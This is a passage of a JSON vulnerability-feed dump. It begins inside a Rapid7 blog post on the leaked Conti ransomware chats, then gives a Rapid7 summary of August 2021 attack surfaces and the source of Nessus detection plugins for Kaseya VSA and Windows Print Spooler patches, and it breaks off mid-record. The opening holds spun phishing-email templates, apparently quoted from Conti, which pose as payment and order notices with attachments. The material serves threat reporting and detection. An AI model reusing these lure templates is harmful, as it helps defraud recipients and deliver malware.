{sent|mailed|delivered} to you {is paid|is covered|is processed}. \nD: {Purchase order|Order} {verification|approval}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{We are contacting you to|This is to|This mail is to} {notify|remind} you {about|regarding} your {debt|unprocessed payment} for {our last|the recent|our recent} {contract|agreement}. All {compensation|payment} {data|information}, {agreement|contract} and prepared legal {documents|documentation} {can be found|are located} in the {file attached|attached file}. \nT: {Missing|Additional} payment {information|details|info} reminder \nD: {Contract|Agreement} 2815/2 {case|claim}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{Your payment|Your advance payment|Your obligatory payment|Payment you sent|Payment you made} was {successfully|correctly|timely|properly} {achieved|accomplished|approved|affirmed|received|obtained|collected|processed}. All {required documentation|necessary documents|important documentation|documents you need|details that can be important|essential documents} {can be found|you can find} in the {attached file|file attached}. \nT: {Invoicing|Invoice|Agreement|Contract|Payment} {info|data|information|details} \nD: {Receipt|Bill} {id|ID|Number|number|No.|No.|No|#|##} 3212-inv8\n\n{Greetings|Hello|Good day|Good afternoon}{!|,|} \n{Thank you for|We are thankful for|We are grateful for|Many thanks for} {your|your recent} {on-line order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} \u041d\u041e\u041c\u0415\u0420 \u041f\u0415\u0420\u0415\u0412\u041e\u0414\u0410. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}. \n{Total|Full|Whole} {order|purchase|payment} sum: \u0421\u0423\u041c\u041c\u0410 \nYou {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} \u041d\u041e\u041c\u0415\u0420 \u0427\u0415\u041a\u0410 {in|in the} {attached file|file attached}. \n{Thank you!|Have a nice day!} \n\u0422\u0415\u041c\u042b: Your {order|purchase|on-line order|last order} \u041d\u041e\u041c\u0415\u0420 \u0417\u0410\u041a\u0410\u0417\u0410 payment {processed|obtained|received} \n\u0410\u0422\u0422\u0410\u0427\u0418: \nord_conf \nfull.details \ncompl_ord_7847 \nbuyer_auth_doc \ninfo_summr \ncustomer_docs \nspec-ed_info\n\n \n_**Additional reading**_\n\n * _[Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)_\n * _[Staying Secure in a Global Cyber Conflict](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)_\n * _[Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-03-01T19:15:58", "type": "rapid7blog", "title": "Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2020-1472", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-44228"], "modified": "2022-03-01T19:15:58", "id": "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "href": "https://blog.rapid7.com/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T01:34:04", "description": "![Popular Attack Surfaces, August 2021: What You Need to Know](https://blog.rapid7.com/content/images/2021/08/August-vulns.jpg)\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n![Popular Attack Surfaces, August 2021: What You Need to Know](https://blog.rapid7.com/content/images/2021/08/image.png)\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, it\u2019s still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:31:02", "description": "The version of Kaseya VSA installed on the remote host is affected by multiple vulnerabilities as referenced in the vendor advisory:\n\n - Credentials leak and business logic flaw. (CVE-2021-30116)\n\n - Cross-Site Scripting vulnerability (XSS). (CVE-2021-30119)\n\n - 2FA Authentication bypass. (CVE-2021-30120)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-12T00:00:00", "type": "nessus", "title": "Kaseya VSA < 9.5.7a Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30119", "CVE-2021-30120"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:kaseya:virtual_system_administrator", "cpe:/a:kaseya:vsa"], "id": "KASEYA_9_5_7_2994.NASL", "href": "https://www.tenable.com/plugins/nessus/151494", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151494);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-30116\", \"CVE-2021-30119\", \"CVE-2021-30120\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0033\");\n\n script_name(english:\"Kaseya VSA < 9.5.7a Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Kaseya VSA instance installed on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Kaseya VSA installed on the remote host is affected by multiple vulnerabilities as \nreferenced in the vendor advisory:\n\n - Credentials leak and business logic flaw. (CVE-2021-30116)\n\n - Cross-Site Scripting vulnerability (XSS). (CVE-2021-30119)\n\n - 2FA Authentication bypass. (CVE-2021-30120)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.kaseya.com/potential-attack-on-kaseya-vsa/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Kaseya VSA version 9.5.7a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-30116\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kaseya:virtual_system_administrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kaseya:vsa\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"kaseya_vsa_detect.nbin\");\n script_require_keys(\"installed_sw/Kaseya Virtual System Administrator\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\n var port = get_http_port(default:443);\n var app_info = vcf::get_app_info(app:'Kaseya Virtual System Administrator', port:port, webapp:TRUE);\n\nvar constraints = [\n { 'min_version' : '0.0', 'fixed_version' : '9.5.7.2994'}\n];\n\nvcf::kaseya_vsa::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:55", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004946: Windows 10 1909 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004946.NASL", "href": "https://www.tenable.com/plugins/nessus/151472", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151472);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004946\");\n script_xref(name:\"MSFT\", value:\"MS21-5004946\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004946: Windows 10 1909 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004946\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004946\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004946'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'18363',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004946])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004959: Windows Server 2008 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004959.NASL", "href": "https://www.tenable.com/plugins/nessus/151478", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151478);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004959\");\n script_xref(name:\"MSFT\", value:\"MS21-5004959\");\n 